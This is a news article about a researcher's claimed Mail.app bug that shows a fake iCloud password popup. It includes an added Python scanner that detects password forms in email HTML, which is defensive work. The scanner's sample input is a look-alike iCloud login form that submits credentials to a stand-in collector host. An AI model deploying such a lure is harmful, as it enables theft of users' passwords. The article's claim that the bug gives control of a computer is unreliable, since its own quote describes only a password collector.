Image: iCloud two-step verification. Apple ID holders with two-step verification enabled may see a few more padlocks on their iCloud screens. (Screenshot/Apple)

Prepare to change your iOS password. A security researcher claims to have developed a way to send iCloud users fake phishing emails that, by exploiting a security bug in Apple's system, could make millions of customer passwords vulnerable.

Jan Soucek, a white hat hacker (meaning he uses his powers for good, not evil), built an iOS 8.3 Mail.app popup that looks just like the kind of messages Apple users normally see when they're asked to enter their password. Instead of giving an iCloud user access to their account, though, it enables hackers to take control of a target's computer. Apple has not verified that the security bug exists and Soucek did not hear back when he tried reporting the issue, according to the Register, a British tech publication.

“This bug allows remote HTML content to be loaded, replacing the content of the original email message,” Soucek wrote on a GitHub page where he also attached a video showing how the hack was made possible. “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password 'collector' using simple HTML and CSS.”
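A mail gateway or client-side filter can flag the kind of script-free HTML password form Soucek describes, since such a form is visible in the markup itself. The Python check below is an added example, not code from Soucek's GitHub page or from Apple; the class and function names, the field-name heuristics and the two sample messages are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class CredentialFormScanner(HTMLParser):
    """Finds password-style inputs in an HTML mail body; no script needed."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []   # one dict per form holding a secret field
        self._form = None    # form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": a.get("method", "get").lower(),
                          "password_fields": []}
        elif tag == "input":
            name = a.get("name", "")
            secret = (a.get("type", "text").lower() == "password"
                      or any(w in name.lower() for w in ("pass", "pwd")))
            if secret and self._form is not None:
                self._form["password_fields"].append(name)
            elif secret:  # stray input outside any <form>
                self.findings.append({"action": "", "method": "",
                                      "password_fields": [name]})

    def handle_endtag(self, tag):
        if tag == "form":
            self._flush()

    def _flush(self):
        if self._form and self._form["password_fields"]:
            self.findings.append(self._form)
        self._form = None

def scan_mail_html(body):
    """Return suspicious forms, each annotated with the host it submits to."""
    scanner = CredentialFormScanner()
    scanner.feed(body)
    scanner.close()
    scanner._flush()  # a form left unclosed still counts
    for f in scanner.findings:
        f["remote_host"] = urlparse(f["action"]).hostname
    return scanner.findings

# Constructed samples: a look-alike login prompt and an ordinary newsletter.
LOGIN_LURE = ('<div style="border-radius:8px"><b>Sign in to iCloud</b>'
              '<form method="POST" action="https://collector.example/login">'
              '<input type="text" name="appleid"><input type="password" name="pw">'
              '<input type="submit" value="OK"></form></div>')
NEWSLETTER = '<form action="https://news.example/sub"><input type="email" name="e"></form>'
```

A message that yields any finding can be quarantined or rendered with its form elements stripped, because legitimate mail rarely needs a password field in the body.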

Again, Apple has yet to confirm the hack is authentic and no iCloud users appear to have been affected by the security bug. But the issue again underscores how easily phishing attacks, in which hackers ask users to input their information into what appears to be a trusted page, can wreak havoc on someone's digital life. It's also another headache for iCloud, which was exploited in the hack that led to hundreds of celebrity nude photos being posted online without the celebrities' knowledge or permission.